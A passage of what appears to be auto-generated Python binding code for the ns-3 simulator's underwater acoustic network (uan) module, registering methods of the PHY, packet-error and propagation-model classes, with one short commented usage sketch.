is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanPhyDual::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_const=True, is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanNetDevice> ns3::UanPhyDual::GetDevice() [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::UanNetDevice >',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::UanTxMode ns3::UanPhyDual::GetMode(uint32_t n) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('uint32_t', 'n')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::UanModesList ns3::UanPhyDual::GetModesPhy1() const [member function]
cls.add_method('GetModesPhy1',
'ns3::UanModesList',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::UanModesList ns3::UanPhyDual::GetModesPhy2() const [member function]
cls.add_method('GetModesPhy2',
'ns3::UanModesList',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): uint32_t ns3::UanPhyDual::GetNModes() [member function]
cls.add_method('GetNModes',
'uint32_t',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhyDual::GetPacketRx() const [member function]
cls.add_method('GetPacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True, is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanPhyPer> ns3::UanPhyDual::GetPerModelPhy1() const [member function]
cls.add_method('GetPerModelPhy1',
'ns3::Ptr< ns3::UanPhyPer >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanPhyPer> ns3::UanPhyDual::GetPerModelPhy2() const [member function]
cls.add_method('GetPerModelPhy2',
'ns3::Ptr< ns3::UanPhyPer >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhyDual::GetPhy1PacketRx() const [member function]
cls.add_method('GetPhy1PacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhyDual::GetPhy2PacketRx() const [member function]
cls.add_method('GetPhy2PacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetRxGainDb() [member function]
cls.add_method('GetRxGainDb',
'double',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetRxGainDbPhy1() const [member function]
cls.add_method('GetRxGainDbPhy1',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetRxGainDbPhy2() const [member function]
cls.add_method('GetRxGainDbPhy2',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetRxThresholdDb() [member function]
cls.add_method('GetRxThresholdDb',
'double',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanPhyCalcSinr> ns3::UanPhyDual::GetSinrModelPhy1() const [member function]
cls.add_method('GetSinrModelPhy1',
'ns3::Ptr< ns3::UanPhyCalcSinr >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanPhyCalcSinr> ns3::UanPhyDual::GetSinrModelPhy2() const [member function]
cls.add_method('GetSinrModelPhy2',
'ns3::Ptr< ns3::UanPhyCalcSinr >',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): ns3::Ptr<ns3::UanTransducer> ns3::UanPhyDual::GetTransducer() [member function]
cls.add_method('GetTransducer',
'ns3::Ptr< ns3::UanTransducer >',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetTxPowerDb() [member function]
cls.add_method('GetTxPowerDb',
'double',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetTxPowerDbPhy1() const [member function]
cls.add_method('GetTxPowerDbPhy1',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): double ns3::UanPhyDual::GetTxPowerDbPhy2() const [member function]
cls.add_method('GetTxPowerDbPhy2',
'double',
[],
is_const=True)
## uan-phy-dual.h (module 'uan'): static ns3::TypeId ns3::UanPhyDual::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy1Idle() [member function]
cls.add_method('IsPhy1Idle',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy1Rx() [member function]
cls.add_method('IsPhy1Rx',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy1Tx() [member function]
cls.add_method('IsPhy1Tx',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy2Idle() [member function]
cls.add_method('IsPhy2Idle',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy2Rx() [member function]
cls.add_method('IsPhy2Rx',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsPhy2Tx() [member function]
cls.add_method('IsPhy2Tx',
'bool',
[])
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateBusy() [member function]
cls.add_method('IsStateBusy',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateCcaBusy() [member function]
cls.add_method('IsStateCcaBusy',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateIdle() [member function]
cls.add_method('IsStateIdle',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateRx() [member function]
cls.add_method('IsStateRx',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateSleep() [member function]
cls.add_method('IsStateSleep',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): bool ns3::UanPhyDual::IsStateTx() [member function]
cls.add_method('IsStateTx',
'bool',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::NotifyIntChange() [member function]
cls.add_method('NotifyIntChange',
'void',
[],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::NotifyTransStartTx(ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('NotifyTransStartTx',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::RegisterListener(ns3::UanPhyListener * listener) [member function]
cls.add_method('RegisterListener',
'void',
[param('ns3::UanPhyListener *', 'listener')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SendPacket(ns3::Ptr<ns3::Packet> pkt, uint32_t modeNum) [member function]
cls.add_method('SendPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('uint32_t', 'modeNum')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetCcaThresholdDb(double thresh) [member function]
cls.add_method('SetCcaThresholdDb',
'void',
[param('double', 'thresh')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetCcaThresholdPhy1(double thresh) [member function]
cls.add_method('SetCcaThresholdPhy1',
'void',
[param('double', 'thresh')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetCcaThresholdPhy2(double thresh) [member function]
cls.add_method('SetCcaThresholdPhy2',
'void',
[param('double', 'thresh')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetChannel(ns3::Ptr<ns3::UanChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetDevice(ns3::Ptr<ns3::UanNetDevice> device) [member function]
cls.add_method('SetDevice',
'void',
[param('ns3::Ptr< ns3::UanNetDevice >', 'device')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetEnergyModelCallback(ns3::Callback<void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('SetEnergyModelCallback',
'void',
[param('ns3::Callback< void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetMac(ns3::Ptr<ns3::UanMac> mac) [member function]
cls.add_method('SetMac',
'void',
[param('ns3::Ptr< ns3::UanMac >', 'mac')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetModesPhy1(ns3::UanModesList modes) [member function]
cls.add_method('SetModesPhy1',
'void',
[param('ns3::UanModesList', 'modes')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetModesPhy2(ns3::UanModesList modes) [member function]
cls.add_method('SetModesPhy2',
'void',
[param('ns3::UanModesList', 'modes')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetPerModelPhy1(ns3::Ptr<ns3::UanPhyPer> per) [member function]
cls.add_method('SetPerModelPhy1',
'void',
[param('ns3::Ptr< ns3::UanPhyPer >', 'per')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetPerModelPhy2(ns3::Ptr<ns3::UanPhyPer> per) [member function]
cls.add_method('SetPerModelPhy2',
'void',
[param('ns3::Ptr< ns3::UanPhyPer >', 'per')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetReceiveErrorCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveErrorCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetReceiveOkCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveOkCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetRxGainDb(double gain) [member function]
cls.add_method('SetRxGainDb',
'void',
[param('double', 'gain')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetRxGainDbPhy1(double gain) [member function]
cls.add_method('SetRxGainDbPhy1',
'void',
[param('double', 'gain')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetRxGainDbPhy2(double gain) [member function]
cls.add_method('SetRxGainDbPhy2',
'void',
[param('double', 'gain')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetRxThresholdDb(double thresh) [member function]
cls.add_method('SetRxThresholdDb',
'void',
[param('double', 'thresh')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetSinrModelPhy1(ns3::Ptr<ns3::UanPhyCalcSinr> calcSinr) [member function]
cls.add_method('SetSinrModelPhy1',
'void',
[param('ns3::Ptr< ns3::UanPhyCalcSinr >', 'calcSinr')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetSinrModelPhy2(ns3::Ptr<ns3::UanPhyCalcSinr> calcSinr) [member function]
cls.add_method('SetSinrModelPhy2',
'void',
[param('ns3::Ptr< ns3::UanPhyCalcSinr >', 'calcSinr')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetSleepMode(bool sleep) [member function]
cls.add_method('SetSleepMode',
'void',
[param('bool', 'sleep')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetTransducer(ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('SetTransducer',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'trans')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetTxPowerDb(double txpwr) [member function]
cls.add_method('SetTxPowerDb',
'void',
[param('double', 'txpwr')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetTxPowerDbPhy1(double arg0) [member function]
cls.add_method('SetTxPowerDbPhy1',
'void',
[param('double', 'arg0')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::SetTxPowerDbPhy2(double arg0) [member function]
cls.add_method('SetTxPowerDbPhy2',
'void',
[param('double', 'arg0')])
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::StartRxPacket(ns3::Ptr<ns3::Packet> pkt, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('StartRxPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_virtual=True)
## uan-phy-dual.h (module 'uan'): void ns3::UanPhyDual::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
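# Illustrative note (not part of the generated scan): UanPhyDual wraps two underlying
# PHYs and, beyond the UanPhy interface, registers per-PHY accessors above
# (e.g. SetCcaThresholdPhy1/Phy2, SetModesPhy1/Phy2). Hedged sketch:
#
#   import ns.uan
#   dual = ns.uan.UanPhyDual()
#   dual.SetCcaThresholdPhy1(10.0)  # threshold values are hypothetical
#   dual.SetCcaThresholdPhy2(15.0)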
def register_Ns3UanPhyGen_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyGen::UanPhyGen(ns3::UanPhyGen const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyGen const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyGen::UanPhyGen() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): int64_t ns3::UanPhyGen::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::EnergyDepletionHandler() [member function]
cls.add_method('EnergyDepletionHandler',
'void',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyGen::GetCcaThresholdDb() [member function]
cls.add_method('GetCcaThresholdDb',
'double',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): ns3::Ptr<ns3::UanChannel> ns3::UanPhyGen::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::UanChannel >',
[],
is_const=True, is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::UanModesList ns3::UanPhyGen::GetDefaultModes() [member function]
cls.add_method('GetDefaultModes',
'ns3::UanModesList',
[],
is_static=True)
## uan-phy-gen.h (module 'uan'): ns3::Ptr<ns3::UanNetDevice> ns3::UanPhyGen::GetDevice() [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::UanNetDevice >',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): ns3::UanTxMode ns3::UanPhyGen::GetMode(uint32_t n) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('uint32_t', 'n')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): uint32_t ns3::UanPhyGen::GetNModes() [member function]
cls.add_method('GetNModes',
'uint32_t',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPhyGen::GetPacketRx() const [member function]
cls.add_method('GetPacketRx',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True, is_virtual=True)
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyGen::GetRxGainDb() [member function]
cls.add_method('GetRxGainDb',
'double',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyGen::GetRxThresholdDb() [member function]
cls.add_method('GetRxThresholdDb',
'double',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): ns3::Ptr<ns3::UanTransducer> ns3::UanPhyGen::GetTransducer() [member function]
cls.add_method('GetTransducer',
'ns3::Ptr< ns3::UanTransducer >',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyGen::GetTxPowerDb() [member function]
cls.add_method('GetTxPowerDb',
'double',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyGen::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateBusy() [member function]
cls.add_method('IsStateBusy',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateCcaBusy() [member function]
cls.add_method('IsStateCcaBusy',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateIdle() [member function]
cls.add_method('IsStateIdle',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateRx() [member function]
cls.add_method('IsStateRx',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateSleep() [member function]
cls.add_method('IsStateSleep',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): bool ns3::UanPhyGen::IsStateTx() [member function]
cls.add_method('IsStateTx',
'bool',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::NotifyIntChange() [member function]
cls.add_method('NotifyIntChange',
'void',
[],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::NotifyTransStartTx(ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txMode) [member function]
cls.add_method('NotifyTransStartTx',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txMode')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::RegisterListener(ns3::UanPhyListener * listener) [member function]
cls.add_method('RegisterListener',
'void',
[param('ns3::UanPhyListener *', 'listener')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SendPacket(ns3::Ptr<ns3::Packet> pkt, uint32_t modeNum) [member function]
cls.add_method('SendPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('uint32_t', 'modeNum')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetCcaThresholdDb(double thresh) [member function]
cls.add_method('SetCcaThresholdDb',
'void',
[param('double', 'thresh')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetChannel(ns3::Ptr<ns3::UanChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetDevice(ns3::Ptr<ns3::UanNetDevice> device) [member function]
cls.add_method('SetDevice',
'void',
[param('ns3::Ptr< ns3::UanNetDevice >', 'device')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetEnergyModelCallback(ns3::Callback<void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetEnergyModelCallback',
'void',
[param('ns3::Callback< void, int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetMac(ns3::Ptr<ns3::UanMac> mac) [member function]
cls.add_method('SetMac',
'void',
[param('ns3::Ptr< ns3::UanMac >', 'mac')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetReceiveErrorCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveErrorCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetReceiveOkCallback(ns3::Callback<void, ns3::Ptr<ns3::Packet>, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveOkCallback',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, double, ns3::UanTxMode, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetRxGainDb(double gain) [member function]
cls.add_method('SetRxGainDb',
'void',
[param('double', 'gain')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetRxThresholdDb(double thresh) [member function]
cls.add_method('SetRxThresholdDb',
'void',
[param('double', 'thresh')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetSleepMode(bool sleep) [member function]
cls.add_method('SetSleepMode',
'void',
[param('bool', 'sleep')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetTransducer(ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('SetTransducer',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'trans')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::SetTxPowerDb(double txpwr) [member function]
cls.add_method('SetTxPowerDb',
'void',
[param('double', 'txpwr')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::StartRxPacket(ns3::Ptr<ns3::Packet> pkt, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp) [member function]
cls.add_method('StartRxPacket',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): void ns3::UanPhyGen::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanPhyPer_methods(root_module, cls):
## uan-phy.h (module 'uan'): ns3::UanPhyPer::UanPhyPer() [constructor]
cls.add_constructor([])
## uan-phy.h (module 'uan'): ns3::UanPhyPer::UanPhyPer(ns3::UanPhyPer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyPer const &', 'arg0')])
## uan-phy.h (module 'uan'): double ns3::UanPhyPer::CalcPer(ns3::Ptr<ns3::Packet> pkt, double sinrDb, ns3::UanTxMode mode) [member function]
cls.add_method('CalcPer',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'sinrDb'), param('ns3::UanTxMode', 'mode')],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyPer::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyPer::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
is_virtual=True)
## uan-phy.h (module 'uan'): static ns3::TypeId ns3::UanPhyPer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyPerGenDefault_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerGenDefault::UanPhyPerGenDefault(ns3::UanPhyPerGenDefault const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyPerGenDefault const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerGenDefault::UanPhyPerGenDefault() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyPerGenDefault::CalcPer(ns3::Ptr<ns3::Packet> pkt, double sinrDb, ns3::UanTxMode mode) [member function]
cls.add_method('CalcPer',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'sinrDb'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyPerGenDefault::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPhyPerUmodem_methods(root_module, cls):
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerUmodem::UanPhyPerUmodem(ns3::UanPhyPerUmodem const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyPerUmodem const &', 'arg0')])
## uan-phy-gen.h (module 'uan'): ns3::UanPhyPerUmodem::UanPhyPerUmodem() [constructor]
cls.add_constructor([])
## uan-phy-gen.h (module 'uan'): double ns3::UanPhyPerUmodem::CalcPer(ns3::Ptr<ns3::Packet> pkt, double sinrDb, ns3::UanTxMode mode) [member function]
cls.add_method('CalcPer',
'double',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('double', 'sinrDb'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-phy-gen.h (module 'uan'): static ns3::TypeId ns3::UanPhyPerUmodem::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPropModel_methods(root_module, cls):
## uan-prop-model.h (module 'uan'): ns3::UanPropModel::UanPropModel() [constructor]
cls.add_constructor([])
## uan-prop-model.h (module 'uan'): ns3::UanPropModel::UanPropModel(ns3::UanPropModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPropModel const &', 'arg0')])
## uan-prop-model.h (module 'uan'): void ns3::UanPropModel::Clear() [member function]
cls.add_method('Clear',
'void',
[],
is_virtual=True)
## uan-prop-model.h (module 'uan'): void ns3::UanPropModel::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
is_virtual=True)
## uan-prop-model.h (module 'uan'): ns3::Time ns3::UanPropModel::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_pure_virtual=True, is_virtual=True)
## uan-prop-model.h (module 'uan'): double ns3::UanPropModel::GetPathLossDb(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode txMode) [member function]
cls.add_method('GetPathLossDb',
'double',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'txMode')],
is_pure_virtual=True, is_virtual=True)
## uan-prop-model.h (module 'uan'): ns3::UanPdp ns3::UanPropModel::GetPdp(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPdp',
'ns3::UanPdp',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_pure_virtual=True, is_virtual=True)
## uan-prop-model.h (module 'uan'): static ns3::TypeId ns3::UanPropModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
return
def register_Ns3UanPropModelIdeal_methods(root_module, cls):
## uan-prop-model-ideal.h (module 'uan'): ns3::UanPropModelIdeal::UanPropModelIdeal(ns3::UanPropModelIdeal const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPropModelIdeal const &', 'arg0')])
## uan-prop-model-ideal.h (module 'uan'): ns3::UanPropModelIdeal::UanPropModelIdeal() [constructor]
cls.add_constructor([])
## uan-prop-model-ideal.h (module 'uan'): ns3::Time ns3::UanPropModelIdeal::GetDelay(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetDelay',
'ns3::Time',
[param('ns3::Ptr< ns3::MobilityModel >', 'a'), param('ns3::Ptr< ns3::MobilityModel >', 'b'), param('ns3::UanTxMode', 'mode')],
is_virtual=True)
## uan-prop-model-ideal.h (module 'uan'): double ns3::UanPropModelIdeal::GetPathLossDb(ns3::Ptr<ns3::MobilityModel> a, ns3::Ptr<ns3::MobilityModel> b, ns3::UanTxMode mode) [member function]
cls.add_method('GetPathLossDb',
'double',
